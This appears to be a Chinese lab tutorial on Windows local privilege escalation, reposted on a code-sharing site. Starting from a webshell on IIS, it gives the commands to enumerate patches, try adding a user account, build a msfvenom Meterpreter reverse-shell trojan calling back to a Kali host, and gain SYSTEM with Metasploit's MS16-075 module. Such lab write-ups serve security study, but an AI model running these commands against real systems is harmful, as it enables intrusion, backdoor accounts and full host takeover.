Windows本地提權


前言

window本地漏洞提權,是指利用Windows系統本地進程或系統服務的漏洞,將普通用戶權限(Sql Server、.net framework)權限提示至system權限

提權的原理

當你使用當前用戶的權限來創建的shell通信,你當前的shell就是什么權限,就好像你使用管理員運行一個木馬文件,對方獲得權限就是管理員,而Windows本地溢出就是利用system權限的缺陷開啟shell進程,相對應的就可獲得system權限。

實驗環境

Windows server 2008 + SQL Server 2014 + IIS 7 IP:192.168.233.135

kali Linux 2020 IP:192.168.233.130
Windows 10 IP:192.168.233.1(中國蟻劍環境)

使用MSF對漏洞進行提權操作

存在webshell,普通權限
1.查看當前webshell權限,普通IIS權限,嘗試添加用戶失敗

whoami

net user admsdf admin123 /add


systeminfo查看系統補丁情況

systeminfo


將查出來的補丁號放置在網站中查詢存在的溢出漏洞 https://bugs.hacking8.com/tiquan/

找到選擇一個可以在機器上使用的漏洞編號,暫時記錄,待會會用

2.打開kali,使用msf生成Windows msf遠控木馬,並監聽端口
查看當前ip地址:

ifconfig


生成meterpreter木馬(生成更多木馬文件請參考https://www.cnblogs.com/tianlinlin/p/10171981.html)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.233.130 LPORT=1233 -f exe > shell.exe


啟動msf框架,選擇監聽模塊

msfconsole
use exploit/multi/handler


設置接收反彈的payload類型,設置要監聽的ip的端口 記得監聽的端口和地址需要和生成木馬的端口及ip地址相對應

set payload windows/meterpreter/reverse_tcp
set lport 1233
set lhost 192.168.233.130
options


開啟監聽(在開啟監聽前記得options查看一下當前的配置是否與生成的木馬參數是否一致哦)

run


3.使用webshell將木馬上傳到網站目錄,並使用終端運行,成功獲得meterpreter shell
將shell從kali復制到物理機,使用蟻劍上傳webshell

上傳成功

右擊,選擇在此處打開虛擬終端,選擇剛剛的shell.exe,回車運行

查看kali虛擬機,成功獲得反彈shell,getuid查看當前用戶

getuid


4.使用msf中post模塊中ms16-075嘗試本地溢出(鄭重提示,如果是本地環境測試可以多嘗試幾下,如果是正式滲透測試,使用exp的時候一定先要看說明或者readme,不然很有可能造成目標藍屏關機等情況
sysinfo確定目標架構 Windows 2008 server,x64位系統(Windows下執行systeminfo也可以查看)

sysinfo


將環境調至后台運行,(注意彈出的session id待會要用)選擇剛剛對比已經安裝過的補丁,嘗試使用未安裝補丁的exp進行攻擊(MS16-075)

background
search ms16-075


選擇其中的一個模塊進行測試(我本機短長度exp測試失敗了,我覺得主要原因是看不懂注釋),可以看到,payload已經幫我們默認選好了(windows/meterpreter/reverse_tcp),payload中的選項也自帶填好了。大家的如果沒有就手動set選擇填一下吧

use exploit/windows/local/ms16_075_reflection_juicy 
options


選擇必選項session,將我們剛剛的sessionID放進去,run啟動exp

set session 2
run


漏洞利用成功,這時候getuid查看權限也就是system權限了

本篇文章到此就結束了,有錯誤的希望多讀指正,留言即可哦


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM